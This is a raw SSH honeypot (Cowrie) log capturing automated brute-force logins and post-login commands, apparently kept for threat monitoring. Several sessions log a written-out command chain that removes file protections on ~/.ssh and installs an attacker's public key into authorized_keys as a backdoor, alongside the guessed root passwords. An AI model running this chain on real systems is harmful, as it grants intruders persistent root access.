{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44011,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9245a51a92c","protocol":"ssh","message":"New connection: 212.227.235.229:44011 (1.2.3.4:22) [session: b9245a51a92c]","sensor":"my-vps","timestamp":"2025-09-09T06:25:27.515117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:25:27.516333Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:25:27.884820Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.login.success","username":"root","password":"Festival","message":"login attempt [root/Festival] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:29.726089Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:30.591752Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:30.592493Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:30.593426Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:31.308586Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:31.713540Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:25:31.714380Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35040,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6c613b4a179","protocol":"ssh","message":"New connection: 212.227.235.229:35040 (1.2.3.4:22) [session: a6c613b4a179]","sensor":"my-vps","timestamp":"2025-09-09T06:25:31.771534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:31.772801Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:31.858142Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.060905Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.062275Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.login.success","username":"root","password":"Linux123!@#","message":"login attempt [root/Linux123!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.241339Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:32.479063Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.479912Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.481452Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.568412Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45006,"dst_ip":"1.2.3.4","dst_port":22,"session":"21f9aa505df0","protocol":"ssh","message":"New connection: 212.227.235.229:45006 (1.2.3.4:22) [session: 21f9aa505df0]","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.619919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.724661Z","src_ip":"212.227.235.229","session":"21f9aa505df0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:32.760137Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.760970Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.849772Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.850863Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35149,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fcee387d64d","protocol":"ssh","message":"New connection: 212.227.235.229:35149 (1.2.3.4:22) [session: 4fcee387d64d]","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.897076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.898008Z","src_ip":"212.227.235.229","session":"4fcee387d64d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:32.964336Z","src_ip":"212.227.235.229","session":"4fcee387d64d"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:25:33.066308Z","src_ip":"212.227.235.229","session":"21f9aa505df0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:25:33.273239Z","src_ip":"212.227.235.229","session":"4fcee387d64d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:34.341983Z","src_ip":"212.227.235.229","session":"4fcee387d64d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35325,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b338d46524b","protocol":"ssh","message":"New connection: 212.227.235.229:35325 (1.2.3.4:22) [session: 6b338d46524b]","sensor":"my-vps","timestamp":"2025-09-09T06:25:34.450961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:34.452060Z","src_ip":"212.227.235.229","session":"6b338d46524b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:34.540282Z","src_ip":"212.227.235.229","session":"6b338d46524b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:34.933330Z","src_ip":"212.227.235.229","session":"6b338d46524b"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:35.020896Z","src_ip":"212.227.235.229","session":"a6c613b4a179"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:35.022822Z","src_ip":"212.227.235.229","session":"6b338d46524b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:25:35.670394Z","src_ip":"212.227.235.229","session":"21f9aa505df0"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:37.036144Z","src_ip":"212.227.235.229","session":"21f9aa505df0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46041,"dst_ip":"1.2.3.4","dst_port":22,"session":"efd790243fea","protocol":"ssh","message":"New connection: 212.227.235.229:46041 (1.2.3.4:22) [session: efd790243fea]","sensor":"my-vps","timestamp":"2025-09-09T06:25:37.397503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:25:37.408072Z","src_ip":"212.227.235.229","session":"efd790243fea"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:25:37.768640Z","src_ip":"212.227.235.229","session":"efd790243fea"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:39.218832Z","src_ip":"212.227.235.229","session":"efd790243fea"}
{"eventid":"cowrie.session.closed","duration":"12.1","message":"Connection lost after 12.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:39.573770Z","src_ip":"212.227.235.229","session":"b9245a51a92c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:39.575050Z","src_ip":"212.227.235.229","session":"efd790243fea"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":59374,"dst_ip":"1.2.3.4","dst_port":22,"session":"44ef07bbaf0c","protocol":"ssh","message":"New connection: 118.26.39.178:59374 (1.2.3.4:22) [session: 44ef07bbaf0c]","sensor":"my-vps","timestamp":"2025-09-09T06:25:40.923366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:40.928219Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:41.187262Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
{"eventid":"cowrie.login.success","username":"root","password":"qazwsx123","message":"login attempt [root/qazwsx123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:42.218040Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:42.816788Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:42.817473Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:42.818513Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
